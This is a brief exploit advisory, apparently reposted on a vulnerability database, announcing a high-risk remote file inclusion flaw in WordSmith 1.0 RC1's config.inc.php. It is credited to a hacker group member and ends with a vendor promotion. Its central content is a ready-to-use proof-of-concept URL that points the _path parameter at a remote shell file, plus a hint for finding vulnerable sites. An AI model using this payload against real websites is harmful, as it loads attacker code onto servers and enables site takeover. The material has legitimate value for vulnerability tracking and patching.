WordSmith 1.0 RC1 has a high-risk remote file inclusion vulnerability.
`--==+=================== Electronic Security Team (www.Yee7.com) ====================+==--
--==+ WordSmith 1.0 RC1 (config.inc.php) Remote File Inclusion +==--
--==+================================================================================+==--
Software: WordSmith 1.0 RC1
SF page: http://sourceforge.net/news/?group_id=90418
exploit: Remote File Inclusion [High Risk]
By: ShockShadow - Electronic Security Team (www.Yee7.com)
Home: www.Yee7.com
Download: http://skrypty.webpc.pl/pobierz13.html
##############################
==============
Dork: built in ;)
PoC:
http://domain.com/Script_Path/config.inc.php?_path=http://shell.txt?
###############################
by: ShockShadow
Thanks to: Mr-m07, Al-Shikh, ThE WhitE WolF, HuRrIcAnE, S0m.Ph, KEENEST, Qanas Alyahood, Falcon Hammdan, ArabHacker
AND ALL FRIENDS
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo